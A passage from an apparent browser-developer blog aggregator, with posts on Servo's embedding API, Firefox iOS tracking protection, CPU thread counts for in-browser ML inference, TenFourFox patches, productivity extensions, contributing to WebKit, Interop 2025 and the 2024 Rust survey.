Contrast this with WebKitGTK, where you can write a minimal kiosk app with a fully-functional webview in under 50 lines of C. To close that gap, we’ve started reworking our embedding API towards something more idiomatic and ergonomic, starting with the concept embedders care about most: the webview.

Our new webview API is controlled by calling methods on a WebView handle (@delan, @mrobinson, #35119, #35183, #35192), including navigation and user input. Handles will eventually represent the lifecycle of the webview itself; if you have one, the webview is valid, and if you drop them, the webview is destroyed.

Servo needs to call into the embedder too, and here we’ve started replacing the old EmbedderMsg API with a webview delegate (@delan, @mrobinson, #35211), much like the delegates in Apple’s WebKit API. In Rust, a delegate is a trait that the embedder can install its own impl for. Stay tuned for more on this next month!

Embedders can now intercept any request, not just navigation (@zhuhaichao518, #34961), and you can now identify the webview that caused an HTTP credentials prompt (@pewsheen, @mrobinson, #34808).

Other embedding improvements include:

Other changes

We’ve reworked Servo’s preferences system, making all prefs optional with reasonable defaults (@mrobinson, #34966, #34999, #34994). As a result:

  • The names of all preferences have changed; see the Prefs docs for a list
  • Embedders no longer need a prefs.json resource to get Servo running
  • Some debug options were converted to preferences (@mrobinson, #34998)

Devtools now highlights console.log() arguments according to their types (@simonwuelker, #34810).

Servo’s networking is more efficient now, with the ability to cancel fetches for navigation that contain redirects (@mrobinson, #34919) and cancel fetches for <video> and <media> when the document is unloaded (@mrobinson, #34883). Those changes also eliminate per-request IPC channels for navigation and cancellation respectively, and in the same vein, we’ve eliminated them for image loading too (@mrobinson, #35041).

We’ve continued splitting up our massive script crate (@jdm, #34359, #35157, #35169, #35172), which will eventually make Servo much faster to build.

A few crashes have been fixed, including when exiting Servo (@mukilan, #34917), when using the internal memory profiler (@jdm, #35058), and when running ResizeObserver callbacks (@willypuzzle, #35168).

For developers

We now run CI smoketests on OpenHarmony using a real device (@jschwe, @mukilan, #35006), increasing confidence in your changes beyond compile-time errors.

We’ve also tripled our self-hosted CI runner capacity (@delan, #34983, #35002), making concurrent Windows and macOS builds possible without falling back to the much slower GitHub-hosted runners.

Servo can’t yet run WebDriver-based tests on wpt.fyi, wpt.servo.org, or CI, because the servo executor for the Web Platform Tests does not support testdriver.js. servodriver does, though, so we’ve started fixing test regressions with that executor with the goal of eventually switching to it (@jdm, #34957, #34997).

Donations

Thanks again for your generous support! We are now receiving 3835 USD/month (−11.4% over December) in recurring donations. With this money, we’ve been able to expand our capacity for self-hosted CI runners on Windows, Linux, and macOS builds, halving mach try build times from over an hour to under 30 minutes!

Servo is also on thanks.dev, and already 21 GitHub users (+5 over December) that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conference talks

The Mozilla BlogSpring detox with Firefox for iOS

A hand holding a smartphone with a blooming flower growing from the screen, surrounded by sparkles, against an orange gradient background.

A fresh start isn’t just for your home — your iPhone or iPad deserves a privacy detox too. With Firefox for iOS, you can block hidden trackers, stop fingerprinting, and keep your browsing history more private with Enhanced Tracking Protection.

How Firefox for iOS protects you

Websites and advertisers often track your activity using cookies, fingerprinting and redirect trackers. Firefox’s Enhanced Tracking Protection helps detox your browsing experience by blocking these trackers, keeping your personal data safe from prying eyes.

Learn more about how Enhanced Tracking Protection works in this FAQ.

Privacy features built for iOS

✅ Blocks Social Media Trackers – Prevents social media platforms from monitoring your activity across different sites.
✅ Prevents Cross-Site Tracking – Stops advertisers from following your movements from one site to another.
✅ Blocks Cryptominers and Fingerprinters – Protects your device from unauthorized cryptocurrency mining and digital fingerprinting attempts.
✅ Customizable Protection Levels – Choose between Standard and Strict modes to balance protection and site functionality.
✅ Private Browsing Mode – Browse without saving history, cookies, or site data, ensuring your sessions remain confidential.
✅ Sync Across Devices – Use Firefox on your iPhone, iPad, and desktop while keeping your privacy settings intact.

How to check your privacy settings on Firefox for iOS

Make sure you’re getting the best privacy protection by following these steps on your iPhone or iPad:

  1. Open the Firefox app.
  2. Tap the menu (☰) button at the bottom of the screen.
  3. Select Settings, then tap Tracking Protection.
  4. Choose your desired protection level:
    • Standard: Blocks social media trackers, cross-site trackers, cryptominers, and fingerprinters.
    • Strict: Includes all Standard protections and also stops known tracking content, such as videos, ads, and other elements with tracking code. Pages load faster, but this setting may block some website functionality.

A cleaner, safer way to browse on iOS

Spring cleaning isn’t just about organizing your space—it’s about clearing out digital clutter too. With Firefox for iOS, you can enjoy a faster, safer browsing experience while blocking trackers that slow you down.

🌿 Give your privacy a fresh start — join the Spring Detox with Firefox today.

Get Firefox

Get the browser that protects what’s important

The post Spring detox with Firefox for iOS appeared first on The Mozilla Blog.

The Mozilla BlogWhat is the best hardware concurrency for running inference on CPU?

In the Firefox AI Runtime, we can use multiple threads in the dedicated inference process to speed up execution times on the CPU. The WASM/JS environment can create a SharedArrayBuffer, run multiple threads against its content, and distribute the load across several CPU cores concurrently.

Below is the time taken in seconds on a MacBook M1 Pro, which has 10 physical cores, using our PDF.js image-to-text model to generate an alt text, with different levels of concurrency:

Graph showing the inference duration (Y axis) depending on the number of threads (X axis); 8 threads is fastest, at around 800 ms.

So running several threads is a game-changer! But adding more and more threads eventually slows execution down, to the point where it becomes slower than not using threads at all.

So one question we asked ourselves was: how can we determine the best number of threads?

Physical vs logical cores

According to our most recent public data report, on desktop, 81% of our users are equipped with an Intel CPU, 14% with AMD and the rest are mostly Apple devices.

All modern CPUs provide more logical cores (also called “threads”) than physical cores, thanks to technologies like Intel’s Hyper-Threading or AMD’s Simultaneous Multithreading (SMT).

For example, the Intel Core i9-10900K chip has 10 physical cores and 20 logical cores.

When you spin up threads equal to the number of logical cores, you might see performance gains, especially when tasks are I/O bound or if the CPU can effectively interleave instructions.

However, for compute-bound tasks (like heavy ML inference), having more threads than physical cores can lead to diminishing returns, or even performance drops, due to factors like thread scheduling overhead and cache contention.

Not all cores are created equal

On Apple Silicon, you don’t just have a quantity of cores; you have different kinds of cores. Some are high-performance cores designed for heavy lifting, while others are efficiency cores that are optimized for lower power consumption.

For instance, Apple M1 Pro chips have a combination of high-performance (8) and efficiency cores (2). The physical cores might total 10, but each performance core is designed for heavy-duty tasks, while efficiency cores typically handle background tasks that are less demanding. 

When your machine is under load with ML tasks, it’s often better to fully utilize the high-performance cores and leave some breathing room for the efficiency cores to handle background or system processes. 

Similarly, Intel’s processors mix different kinds of cores, most notably starting with the 12th-generation “Alder Lake” architecture.

These chips feature Performance-cores (P-cores) designed for demanding, single-threaded tasks, and Efficient-cores (E-cores) aimed at background or less intensive workloads. The P-cores can leverage Intel’s Hyper-Threading technology (meaning each P-core can run two logical threads), while E-cores typically run one thread each. This hybrid approach enables the CPU to optimize power usage and performance by scheduling tasks on the cores best suited for them. As with Apple Silicon, you’d typically want to maximize utilization of the higher-performance P-cores, while leaving some headroom on the E-cores for system processes.
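As a hedged arithmetic sketch of that layout (assuming each P-core contributes two logical threads via Hyper-Threading and each E-core contributes one):

```javascript
// Sketch only: derive the logical core count from the hybrid layout
// described above. Assumes each P-core runs two logical threads and
// each E-core runs one.
const logicalCores = (pCores, eCores) => pCores * 2 + eCores;

// The i9-10900K mentioned earlier is all P-cores:
// 10 physical cores → 20 logical cores.
console.log(logicalCores(10, 0)); // 20

// A hybrid chip with 2 P-cores and 8 E-cores reports 12 logical cores.
console.log(logicalCores(2, 8)); // 12
```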

Android is close to Apple Silicon’s architecture, as most devices are using ARM’s big.LITTLE (or DynamIQ) architecture – with 2 types of cores: “big” and “LITTLE”.

On Qualcomm’s mobile CPUs, there can be three types: “Prime”, “Performance” and “Efficiency”. Most recently, some phones like the Samsung Galaxy S24 have gained a fourth kind of core (Exynos 2400), allowing even more combinations.

To summarize, all CPU makers have cores dedicated to performance, and cores for efficiency: 

  • Performance: “P-Core”, “big”, “Prime”, “Performance”
  • Efficiency: “E-Core”, “LITTLE”, “Efficiency”

By combining high-efficiency and high-performance cores, Apple Silicon, Androids, and Intel based devices can strike a better balance between power consumption and raw compute power, depending on the demands of the workload.

But if you try to run all cores (performance + efficiency) at maximum capacity, you may see:

  1. Less optimal thread scheduling, because tasks will bounce between slower efficiency cores and faster performance cores.
  2. Contention for shared resources like the memory bus, cache.
  3. And in extreme cases: thermal throttling if the system overheats, and reaches its Thermal Design Point, in which case the clock speed is throttled to cool down the system. 

This is why simply setting the thread count to “all cores, all the time” can be suboptimal for performance.

AMD, on the other hand, does not have efficiency cores. Some CPUs like the Ryzen 5 8000 combine two sizes of cores, Zen 4 and Zen 4c, but the latter is not an efficiency core and can also be used to run heavy-duty tasks.

navigator.hardwareConcurrency

In a browser, there is a single and simple API you can call: navigator.hardwareConcurrency

This returns the number of logical cores available. Since it’s the only API available on the web, many libraries (including the one we vendor: onnxruntime) default to using navigator.hardwareConcurrency as a baseline for concurrency.

It’s bad practice to use that value directly, as it might overcommit threads, as we’ve explained in the previous sections. It’s also unaware of the current system’s activity.

For that reason, ONNX’s formula takes the number of logical cores divided by two, and never sets the value higher than 4:

Math.min(4, Math.ceil((navigator.hardwareConcurrency || 1) / 2));

That formula works out OK in general, but will not take advantage of all the cores on some devices. For instance, on an Apple M1 Pro, ML tasks could use a concurrency level of up to 8 cores instead of 4.

On the other end of the spectrum is a chip like Intel’s i3-1220p, which we use in our CI to run tests on Windows 11 and which better reflects what our users have — see the hardware section in our Firefox Public Data Report.

It has 12 logical cores and 10 physical cores, composed of 8 efficiency cores and 2 performance cores. ONNX’s formula for that chip means we would run with 4 threads, where 2 would be a better value.
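Plugging those two chips into the ONNX default formula quoted above makes the mismatch concrete (core counts taken from this post):

```javascript
// ONNX's default concurrency formula, as quoted earlier in this post.
const onnxDefaultThreads = (logicalCores) =>
  Math.min(4, Math.ceil((logicalCores || 1) / 2));

// Apple M1 Pro: 10 logical cores → 4 threads, even though up to
// 8 performance cores could be used for ML tasks.
console.log(onnxDefaultThreads(10)); // 4

// Intel i3-1220p: 12 logical cores → 4 threads, even though the chip
// has only 2 performance cores.
console.log(onnxDefaultThreads(12)); // 4
```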

navigator.hardwareConcurrency is a good starting point, but it’s just a blunt instrument. It won’t always yield the true “best” concurrency for a given device and a given workload.

MLUtils.getOptimalCPUConcurrency

While it’s impossible to get the best value at any given time without considering the system activity as a whole, looking at the number of physical cores and avoiding “efficiency” cores can help us get to a better value.

Llama.cpp, for instance, looks at the number of physical cores to decide on concurrency, with a few twists:

  • On any x86_64, it will return the number of performance cores
  • On Android, and any aarch64-based device like Apple Silicon, it will return the number of performance cores for tri-layered chips

We’ve implemented something very similar in a C++ API that can be used via XPIDL in our inference engine:

NS_IMETHODIMP MLUtils::GetOptimalCPUConcurrency(uint8_t* _retval) {
  ProcessInfo processInfo = {};
  if (!NS_SUCCEEDED(CollectProcessInfo(processInfo))) {
    return NS_ERROR_FAILURE;
  }
#if defined(ANDROID)
  // On Android, "big" and "medium" CPUs can be used.
  uint8_t cpuCount = processInfo.cpuPCount + processInfo.cpuMCount;
#else
#  ifdef __aarch64__
  // On aarch64 (like MacBooks) we want to avoid efficiency cores and
  // stick with "big" CPUs.
  uint8_t cpuCount = processInfo.cpuPCount;
#  else
  // On x86_64 we always use the number of physical cores.
  uint8_t cpuCount = processInfo.cpuCores;
#  endif
#endif
  *_retval = cpuCount;
  return NS_OK;
}

This function is then straightforward to use from JS shipped within Firefox to configure concurrency when we run inference:

let mlUtils = Cc["@mozilla.org/ml-utils;1"].createInstance(Ci.nsIMLUtils);
const numThreads = mlUtils.getOptimalCPUConcurrency();

We’ve moved away from using navigator.hardwareConcurrency, and we’re now using this new API.

Conclusion

In our quest to find the optimal number of threads, we’re closer to reality now, but there are other factors to consider. The system will use the CPU for other applications, so it’s still possible to overload it.

Using more threads is also going to use more memory in our WASM environment, which can become a real issue. Depending on the workload, each additional thread can add up to 100MiB of physical memory usage in our runtime. We’re working on reducing this overhead but on devices that don’t have a lot of memory, limiting concurrency is still our best option.
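That memory trade-off can be sketched as a second cap on the thread count. This is an illustration only, not the runtime's actual logic: the ~100 MiB-per-thread figure is the upper bound mentioned above, and `availableMiB` is a hypothetical input.

```javascript
// Sketch: cap the thread count by a WASM memory budget as well as by
// the optimal core count. perThreadMiB is the ~100 MiB upper bound
// cited above; availableMiB is a hypothetical memory budget.
function memoryAwareThreads(optimalCores, availableMiB, perThreadMiB = 100) {
  const memoryCap = Math.floor(availableMiB / perThreadMiB);
  return Math.max(1, Math.min(optimalCores, memoryCap));
}

// 8 usable cores but only ~400 MiB to spare → run 4 threads.
console.log(memoryAwareThreads(8, 400)); // 4
```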

For our Firefox ML features, we are using a variety of hardware profiles in our performance CI to make sure that we try them on devices that are close to what our users have. The list of devices we have is going to grow in the next few months to make sure we cover the whole spectrum of CPUs. We’ve started collecting and aggregating metrics on a dashboard that helps us understand what can be expected when our users run our inference engine.

The hardware landscape is also evolving a lot. For example, the most recent Apple devices introduced a new instruction set, called AMX, which used to be proprietary, and gave a significant boost compared to Neon. That has now been replaced by an official API called SME. Similarly, some phones are getting more core types, which could impact how we calculate the number of cores to use. Our current algorithm could be changed the day we leverage these new APIs and hardware in our backend.

Another aspect we have not discussed in this post is using GPU or even more specialized units like NPUs, to offload our ML tasks, which will be a post on its own.

The post What is the best hardware concurrency for running inference on CPU? appeared first on The Mozilla Blog.

Cameron KaiserFebruary patch set for TenFourFox

I was slack on doing the Firefox 128ESR platform rebase for TenFourFox, but I finally got around tuit, mostly because I've been doing a little more work on the Quad G5 and put some additional patches in to scratch my own itches. (See, this is what I mean by "hobby mode.")

The big upgrade is a substantial overhaul of Reader Mode to pick up interval improvements in Readability. I remind folks that I went all-in on Reader Mode for a reason: it's lightweight, it makes little demands of our now antiquated machines (and TenFourFox's antiquated JavaScript runtime), and it renders very, very fast. That's why, for example, you can open a link directly in Reader Mode (right-click, it's there in the menu), the browser defaults to "sticky" Reader Mode where links you click in an article in Reader Mode stay in Reader Mode (like Las Vegas) until you turn it off from the book icon in the address bar, and you can designate certain sites to always open in Reader Mode, either every page or just subpages in case the front page doesn't render well — though that's improved too. (You can configure that from the TenFourFox preference pane. All of these features are unique to TenFourFox.) I also made some subtle changes to the CSS so that it lays out wider, which was really my only personal complaint; otherwise I'm an avid user. The improvements largely relate to better byline and "fluff" text detection as well as improved selection of article inline images. Try it. You'll like it.

I should note that Readability as written no longer works directly on TenFourFox due to syntactic changes and I had to do some backporting. If a page suddenly snaps to the non-Reader view, there was an error. Look in the Browser console for the message and report it; it's possible there is some corner I didn't hit with my own testing.

In addition, there are updates to the ATSUI font blacklist (and a tweak to CFF font table support) and a few low-risk security patches that likely apply to us, as well as refreshed HSTS pins, TLS root certificates, EV roots, timezone data and TLDs. I have also started adding certain AI-related code to the nuisance JavaScript block list as well as some new adbot host aliases I found. Those probably can't run on TenFourFox anyway (properly if at all), but now they won't even be loaded or parsed.

The source code can be downloaded from Github (at the command line you can also just do git clone https://github.com/classilla/tenfourfox.git) and built in the usual way. Remember that these platform updates require a clobber, so you must build from scratch. I was asked about making TenFourFox a bit friendlier with Github; that's a tall order and I'm still thinking about how, but at least the wiki is readable currently even if it isn't very pretty.

Firefox Add-on ReviewsSupercharge your productivity with a Firefox extension

With more work and education happening online (and at home) you may find yourself needing new ways to juice your productivity. From time management to organizational tools and more, the right Firefox extension can give you an edge in the art of efficiency. 

I need help saving and organizing a lot of web content 

Gyazo

Capture, save, and share anything you find on the web. Gyazo is a great tool for personal or collaborative record keeping and research. 

Clip entire pages or just pertinent portions. Save images or take screenshots. Gyazo makes it easy to perform any type of web clipping action by either right-clicking on the page element you want to save or using the extension’s toolbar button. Everything gets saved to your Gyazo account, making it accessible across devices and collaborative teams. 

On your Gyazo homepage you can easily browse and sort everything you’ve clipped; and organize everything into shareable topics or collections.

<figcaption class="wp-element-caption">With its minimalist pop-up interface, Gyazo makes it easy to clip elements, sections, or entire web pages. </figcaption>

Evernote Web Clipper

Similar to Gyazo, Evernote Web Clipper offers a kindred feature set—clip, save, and share web content—albeit with some nice user interface distinctions. 

Evernote places emphasis on making it easy to annotate images and articles for collaborative purposes. It also has a strong internal search feature, allowing you to search for specific words or phrases that might appear across scattered groupings of clipped content. Evernote also automatically strips out ads and social widgets on your saved pages. 

Print Edit WE

If you need to save or print an important web page — but it’s mucked up with a bunch of unnecessary clutter like ads, sidebars, and other peripheral content — Print Edit WE lets you easily remove those unwanted elements.

Along with a host of great features like the option to save web pages as either HTML or PDF files, automatically delete graphics, and the ability to alter text or add notes, Print Edit WE also provides an array of productivity optimizations like keyboard shortcuts and mouse gestures. This is the ideal productivity extension for any type of work steeped in web research and cataloging.

Focus! Focus! Focus!

Anti-distraction and decluttering extensions can be a major boon for online workers and students… 

Block Site 

Do you struggle to avoid certain time-wasting, productivity-sucking websites? With Block Site you can enforce restrictions on sites that tempt you away from good work habits.

Just list the websites you want to avoid for specified periods of time (certain hours of the day or some days entirely, etc.) and Block Site won’t let you access them until you’re out of the focus zone. There’s also a fun redirection feature where you’re automatically redirected to a more productive website anytime you try to visit a time waster.

<figcaption class="wp-element-caption">Give yourself a custom message of encouragement (or scolding?) whenever you try to visit a restricted site with Block Site</figcaption>

LeechBlock NG

Very similar in function to Block Site, LeechBlock NG offers a few intriguing twists beyond standard site-blocking features. 

In addition to blocking sites during specified times, LeechBlock NG offers an array of granular, website-specific blocking abilities—from blocking just portions of websites (e.g. you can’t access the YouTube homepage but you can see video pages), to setting restrictions on predetermined days (e.g. no Twitter on weekends), to 60-second delayed access to certain websites to give you time to reconsider that potentially productivity-killing decision.

Tomato Clock

A simple but highly effective time management tool, Tomato Clock (based on the Pomodoro technique) helps you stay on task by tracking short, focused work intervals. 

The premise is simple: it assumes everyone’s productive attention span is limited, so break up your work into manageable “tomato” chunks. Let’s say you work best in 40-minute bursts. Set Tomato Clock and your browser will notify you when it’s break time (which is also time customizable). It’s a great way to stay focused via short sprints of productivity. The extension also keeps track of your completed tomato intervals so you can track your achieved results over time.

Tabby – Window & Tab Manager

Are you overwhelmed by lots of open tabs and windows? Need an easy way to overcome desktop chaos? Tabby – Window & Tab Manager to the rescue.

Regain control of your ever-sprawling open tabs and windows with an extension that lets you quickly reorganize everything. Tabby makes it easy to find what you need in a chaotic sea of open tabs — you can not only search by word or phrase for the content you’re looking for, but Tabby also has a visual preview feature so you can get a look at each of your open tabs without actually navigating to them. And whenever you need a clean slate but want to save your work, you can save and close all of your open tabs with a single mouse click and return to them later.

<figcaption class="wp-element-caption">Access all of Tabby’s features in one convenient pop-up. </figcaption>

Tranquility Reader

Imagine a world wide web where everything but the words is stripped away—no more distracting images, ads, tempting links to related stories, nothing—just the words you’re there to read. That’s Tranquility Reader.

Simply hit the toolbar button and instantly streamline any web page. Tranquility Reader offers quite a few other nifty features as well, like the ability to save content offline for later reading, customizable font size and colors, add annotations to saved pages, and more. 

We hope some of these great extensions will give your productivity a serious boost! Fact is, there’s a vast number of extensions out there that could help your productivity—everything from ways to organize tons of open tabs to translation tools to bookmark managers and more.

Karl DubostSome Ways To Contribute To WebKit and Web Interoperability

Graffiti of a robot on a wall with buildings in the background.

Someone asked me recently how to contribute to the WebKit project, and more specifically how to find the low-hanging fruit. While some of these tips are specific to WebKit, they can easily be applied to other browsers. Every browser engine project has more bugs than its team can handle.

In no specific order, here are some ideas for contributing.

Curate Old Bugs on the bug tracker

  1. Go through old bugs on bugs.webkit.org.
  2. Try to understand what the bug is about.
  3. Create a simplified test case when there is none and add it as an attachment.
  4. If it shows differences between the browsers and the issue is visual, take screenshots in Safari (WebKit), Firefox (Gecko), and Chrome (Blink).
  5. If there is no difference between browsers, CC me on the bug, and we will probably be able to close it.

This might help reveal old fixable bugs, or make them easier for another engineer to fix. Some of them might be easy enough that you can start fixing them yourself.

Find Out About Broken Stuff On WPT.

  1. Dive into all the tests which fail in Safari but pass in Firefox and/or Chrome. (You can do a similar search for things failing in Chrome or in Firefox.)
  2. Understand what the test is doing. You can check this with the WPT.live links and/or the associated commit.
  3. Check that the test is not broken and makes sense.
  4. Check if there is an associated bug on bugs.webkit.org. If not, open a new one.

FIXME Hunt Inside WebKit Code

  1. List all the FIXMEs flagged in the WebKit source code.
  2. Not all of them are easy to fix, but some might be low-hanging fruit. That will require diving into the source code and understanding it.
  3. Open a new bug on bugs.webkit.org if one does not yet exist.
  4. Eventually propose a patch.

Test WebKit Quirks

  1. There are a number of Quirks in the WebKit project. These are in place to hotfix websites not doing the right thing.
  2. Sometimes these Quirks are not needed anymore: the site has made a silent fix without telling us about it.
  3. They need to be retested and flagged when they are no longer necessary. This can lead to patches removing the quirk when it is not needed anymore.
  4. Some of these quirks do not have a remove-quirk bug counterpart. It would be good to create the bug for them. Example of a Remove Quirk Bug.

Triage Incoming Bugs On webcompat.com For Safari

  1. From time to time, bugs are reported on webcompat.com for Safari.
  2. They need to be analyzed and understood.
  3. Sometimes, a new bug needs to be opened on bugs.webkit.org.

Again, this mostly explains how to help on the WebKit side, but these types of participation can easily be transposed to Gecko and Blink. If you have other ideas for fixing bugs, let me know.

Otsukare!

Hacks.Mozilla.OrgLaunching Interop 2025

Launching Interop 2025

The Interop Project is a collaboration between browser vendors and other platform implementors to provide users and web developers with high quality implementations of the web platform.

Each year we select a set of focus areas representing key areas where we want to improve interoperability. Encouraging all browser engines to prioritize common features ensures they become usable for web developers as quickly as possible.

Progress in each engine and the overall Interop score are measured by tracking the pass rate of a set of web-platform tests for each focus area using the Interop dashboard.

Interop 2024

Before introducing the new focus areas for this year, we should look at the successes of Interop 2024.

The Interop score, measuring the percentage of tests that pass in all of the major browser engines, has reached 95% in latest browser releases, up from only 46% at the start of the year. In pre-release browsers it’s even higher — over 97%. This is a huge win that shows how effective Interop can be at aligning browsers with the specifications and each other.

Each browser engine individually achieved a test pass score of 98% in stable browser releases and 99% in pre-release, with Firefox finishing slightly ahead with 98.8% in release and 99.1% in Nightly.

For users, this means features such as requestVideoFrameCallback, Declarative Shadow DOM, and Popover, which a year ago only had limited availability, are now implemented interoperably in all browsers.

Interop 2025

Building on Interop 2024’s success, we are excited to continue the project into 2025. This year we have 19 focus areas; 17 new and 2 from previous years. A full description of all the focus areas is available in the Interop repository.

From 2024 we’re carrying forward Layout (really “Flexbox and Grid”), and Pointer and Mouse Events. These are important platform primitives where the Interop project has already led to significant interoperability improvements. However, with technologies that are so fundamental to the modern web we think it’s important to set ambitious goals and continue to prioritize these areas, creating rock solid foundations for developers to build on.

The new focus areas represent a broad cross section of the platform. Many of them — like Anchor Positioning and View Transitions — have been identified from clear developer demand in surveys such as State of HTML and State of CSS. Inclusion in Interop will ensure they’re usable as soon as possible.

In addition to these high profile new features, we’d like to highlight some lesser-known focus areas and explain why we’re pleased to see them in Interop.

Storage Access

At Mozilla user privacy is a core principle. One of the most common methods for tracking across the web is via third-party cookies. When sites request data from external services, the service can store data that’s re-sent when another site uses the same service. Thus the service can follow the user’s browsing across the web.

To counter this, Firefox’s “Total Cookie Protection” partitions storage so that third parties receive different cookie data per site and thus reduces tracking. Other browsers have similar policies, either by default or in private browsing modes.

However, in some cases, non-tracking workflows such as SSO authentication depend on third party cookies. Storage partitioning can break these workflows, and browsers currently have to ship site-specific workarounds. The Storage Access API solves this by letting sites request access to the unpartitioned cookies. Interop here will allow browsers to advance privacy protections without breaking critical functionality.
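As a sketch of how a site might use the Storage Access API (the helper name is mine; `document.hasStorageAccess()` and `document.requestStorageAccess()` are the standard entry points, and the request must generally be made from a user gesture such as a click):

```javascript
// Ask the browser for access to unpartitioned cookies from an embedded
// (third-party) context. Resolves to true if access is available.
async function ensureCookieAccess() {
  // Already have unpartitioned cookie access? Nothing to do.
  if (await document.hasStorageAccess()) return true;
  try {
    // May show a prompt; typically only allowed inside a user gesture.
    await document.requestStorageAccess();
    return true;
  } catch {
    return false; // The user or the browser's policy denied the request.
  }
}
```

An SSO iframe would call this from its login button's click handler and fall back to a redirect-based flow when it resolves to false.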

Web Compat

The Web Compat focus area is unique in Interop. It isn’t about one specific standard, but focuses on browser bugs known to break sites. These are often in older parts of the platform with long-standing inconsistencies. Addressing these requires either aligning implementations with the standard or, where that would break sites, updating the standard itself.

One feature in the Web Compat focus area for 2025 is CSS Zoom. Originally a proprietary feature in Internet Explorer, it allowed scaling layout by adjusting the computed dimensions of elements at a time before CSS transforms. WebKit reverse-engineered it, bringing it into Blink, but Gecko never implemented it, due to the lack of a specification and the complexities it created in layout calculations.

Unfortunately, a feature not being standardised doesn’t prevent developers from using it. Use of CSS Zoom led to layout issues on some sites in Firefox, especially on mobile. We tried various workarounds and have had success using interventions to replace zoom with CSS transforms on some affected sites, but an attempt to implement the same approach directly in Gecko broke more sites than it fixed and was abandoned.

The situation seemed to be at an impasse until 2023 when Google investigated removing CSS Zoom from Chromium. Unfortunately, it turned out that some use cases, such as Microsoft Excel Online’s worksheet zoom, depended on the specific behaviour of CSS Zoom, so removal was not feasible. However, having clarified the use cases, the Chromium team was able to propose a standardized model for CSS Zoom that was easier to implement without compromising compatibility. This proposal was accepted by the CSS WG and led to the first implementation of CSS Zoom in Firefox 126, 24 years after it was first released in Internet Explorer.

With Interop 2025, we hope to bring the story of CSS Zoom to a close with all engines finally converging on the same behaviour, backed by a real open standard.

WebRTC

Video conferencing is now an essential feature of modern life, and in-browser video conferencing offers both ease of use and high security, as users are not required to download a native binary. Most web-based video conferencing relies on the WebRTC API, which offers high level tools for implementing real time communications. However, WebRTC has long suffered from interoperability issues, with implementations deviating from the standards and requiring nonstandard extensions for key features. This resulted in confusion and frustration for users and undermined trust in the web as a reliable alternative to native apps.

Given this history, we’re excited to see WebRTC in Interop for the first time. The main part of the focus area is the RTCRtpScriptTransform API, which enables cross browser end-to-end encryption. Although there’s more to be done in the future, we believe Interop 2025 will be a big step towards making WebRTC a truly interoperable web standard.

Removing Mutation Events

The focus area for Removing Mutation Events is the first time Interop has been used to coordinate the removal of a feature. Mutation events fire when the DOM changes, meaning the event handlers run on the critical path for DOM manipulation, causing major performance issues, and significant implementation complexity. Despite the fact that they have been implemented in all engines, they’re so problematic that they were never standardised. Instead, mutation observers were developed as a standard solution for the use cases of mutation events without their complexity or performance problems. Almost immediately after mutation observers were implemented, a Gecko bug was filed:

“We now have mutation observers, and we’d really like to kill support for mutation events at some point in the future. Probably not for a while yet.”

That was in 2012. The difficulty is the web’s core commitment to backwards compatibility. Removing features that people rely on is unacceptable. However, last year Chromium determined that use of mutation events had dropped low enough to allow a “deprecation trial“, disabling mutation events by default, but allowing specific sites to re-enable them for a limited time.

This is good news, but long-running deprecation trials can create problems for other browsers. Disabling the feature entirely can break sites that rely on the opt-out. On the other hand we know from experience that some sites actually function better in a browser with mutation events disabled (for example, because they are used for non-critical features, but impact performance).

By including this removal in Interop 2025, we can ensure that mutation events are fully removed in 2025 and end the year with reduced platform complexity and improved web performance.
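For reference, the migration this removal assumes looks roughly like the following (the helper name is mine; `MutationObserver` is the standard replacement):

```javascript
// Deprecated pattern, synchronous and on the critical path of every
// DOM change:
//   target.addEventListener("DOMSubtreeModified", onChange);

// Replacement: MutationObserver batches changes and delivers them
// asynchronously, avoiding the performance problems of mutation events.
function watchSubtree(target, onChange) {
  const observer = new MutationObserver((records) => onChange(records));
  observer.observe(target, { childList: true, subtree: true });
  return observer; // Call observer.disconnect() when done.
}
```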

Interop Investigations

As well as focus areas, the Interop project also runs investigations aimed at long-term interoperability improvements in areas where we can't measure progress using test pass rates. For example, Interop investigations may look to add new test capabilities or increase the test coverage of platform features.

Accessibility Investigation

The accessibility investigation started as part of Interop 2023. It has added APIs for testing accessible name and computed role, as well as more than 1000 new tests. Those tests formed the Accessibility focus area in Interop 2024, which achieved an Interop score of 99.7%.

In 2025 the focus will be expanding the testability of accessibility features. Mozilla is working on a prototype of AccessibleNode, an API that enables verifying the shape of the accessibility tree, along with its states and properties. This will allow us to test the effect of features like CSS display: contents or ::before/::after on the accessibility tree.

Mobile Testing Investigation

Today, all Interop focus areas are scored in desktop browsers. However, some features are mobile-specific or have interoperability challenges unique to mobile.

Improving mobile testing has been part of Interop since 2023, and in that time we’ve made significant progress standing up mobile browsers in web-platform-tests CI systems. Today we have reliable runs of Chrome and Firefox Nightly on Android, and Safari runs on iOS are expected soon. However, some parts of our test framework were written with desktop-specific assumptions in the design, so the focus for 2025 will be on bringing mobile testing to parity with desktop. The goal is to allow mobile-specific focus areas in future Interop projects, helping improve interoperability across all device types.

Driving the Web Forward

The unique and distinguishing feature of the web platform is its basis in open standards, providing multiple implementations and user choice. Through the Interop project, web platform implementors collaborate to ensure that these core strengths are matched by a seamless user experience across browsers.

With focus areas covering some of the most important new and existing areas of the modern web, Interop 2025 is set to deliver some of the biggest interoperability wins of the project so far. We are confident that Firefox and other browsers will rise to the challenge, providing users and developers with a more consistent and reliable web platform.


The post Launching Interop 2025 appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language Blog2024 State of Rust Survey Results

Hello, Rustaceans!

The Rust Survey Team is excited to share the results of our 2024 survey on the Rust Programming language, conducted between December 5, 2024 and December 23, 2024. As in previous years, the 2024 State of Rust Survey was focused on gathering insights and feedback from Rust users, and all those who are interested in the future of Rust more generally.

This ninth edition of the survey surfaced new insights and learning opportunities straight from the global Rust language community, which we will summarize below. In addition to this blog post, we have also prepared a report containing charts with aggregated results of all questions in the survey.

Our sincerest thanks to every community member who took the time to express their opinions and experiences with Rust over the past year. Your participation will help us make Rust better for everyone.

There's a lot of data to go through, so strap in and enjoy!

Participation

Survey   Started   Completed   Completion rate   Views
2023     11,950    9,710       82.2%             16,028
2024     9,450     7,310       77.4%             13,564

As shown above, in 2024, we have received fewer survey views than in the previous year. This was likely caused simply by the fact that the survey ran only for two weeks, while in the previous year it ran for almost a month. However, the completion rate has also dropped, which seems to suggest that the survey might be a bit too long. We will take this into consideration for the next edition of the survey.

Community

